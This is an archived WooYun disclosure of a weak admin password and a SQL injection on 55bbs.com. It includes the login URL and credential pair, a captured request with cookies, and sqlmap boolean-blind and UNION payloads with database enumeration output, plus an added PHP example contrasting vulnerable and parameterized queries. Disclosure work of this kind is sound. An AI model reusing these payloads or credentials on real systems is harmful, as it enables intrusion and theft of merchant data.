WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-07-23: Details were reported to the vendor and are awaiting the vendor's handling.
2015-07-28: The vendor has actively ignored the vulnerability; details are disclosed to the public.
As per the title.
Admin backend URL:
http://admin.55bbs.com/login.php
The weak password lijun / lijun123 gets straight into the backend. Capturing the request from one of the search forms:
POST /adpublish/customer_list.php HTTP/1.1
Host: article.55bbs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://article.55bbs.com/adpublish/customer_list.php
Cookie: ID=320; S_uid=lijun; S_checkcode=c7c0d53884ee86346f5dc0d9d27b7e5e; S_power_limit=N
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

text=&workname=nixiaolei&select8=1&button=%B2%E9%D1%AF
Testing showed that the parameter select8 is the injection point. Fed straight to sqlmap:
Parameter: select8 (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: text=&workname=nixiaolei&select8=1 AND 7097=7097&button=%B2%E9%D1%AF

    Type: UNION query
    Title: MySQL UNION query (33) - 11 columns
    Payload: text=&workname=nixiaolei&select8=1 UNION ALL SELECT 33,33,33,33,CONCAT(0x716b627a71,0x48654a5270764e595443,0x717a786a71),33,33,33,33,33,33#&button=%B2%E9%D1%AF
---
[16:37:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
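As an added example (not code from the report, and not 55bbs's own source, which the report does not show), here is a hypothetical PHP reconstruction of the query pattern that turns a POST parameter like select8 into an injection point, beside a hardened version. The table name, column names and the set of allowed option values are assumptions.

```php
<?php
// Added example, hypothetical reconstruction: the 55bbs server code is not
// shown in the report. Table/column names and allowed values are assumed.

// Vulnerable pattern: POST values are concatenated into the SQL text, so
// "1 AND 7097=7097" (boolean-based blind) or "1 UNION ALL SELECT ..." (UNION)
// becomes part of the statement. This is the class of defect sqlmap reported.
function customer_list_vulnerable(mysqli $db, array $post)
{
    $workname = $post['workname'] ?? '';
    $select8  = $post['select8'] ?? '';
    $sql = "SELECT * FROM tbl_customer_info "                 // assumed table
         . "WHERE workname = '" . $workname . "' AND status = " . $select8;
    return $db->query($sql);
}

// Hardened version: select8 is validated as an integer and whitelisted against
// the values the form's <select> actually offers, and both values are bound as
// parameters, so the SQL text is fixed before any user data is seen.
function customer_list_safe(mysqli $db, array $post)
{
    $allowed = [1, 2, 3];                                     // assumed options
    $select8 = filter_var($post['select8'] ?? null, FILTER_VALIDATE_INT);
    if ($select8 === false || !in_array($select8, $allowed, true)) {
        return false;                                         // reject, never repair
    }
    $workname = (string) ($post['workname'] ?? '');
    $stmt = $db->prepare(
        'SELECT * FROM tbl_customer_info WHERE workname = ? AND status = ?'
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('si', $workname, $select8);
    $stmt->execute();
    return $stmt->get_result();
}
```

With the hardened version, the captured request body from the report (select8=1) still works, while the two sqlmap payloads fail integer validation before any query is built.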
There are 3 databases.
available databases [3]:
[*] Admanger
[*] information_schema
[*] test
Quite a lot of tables, 429 in all. Some of them hold important merchant information.
-。-
Severity: No impact (vendor ignored)
Ignored at: 2015-07-28 10:18
Vulnerability Rank: 15 (WooYun rating)
None yet.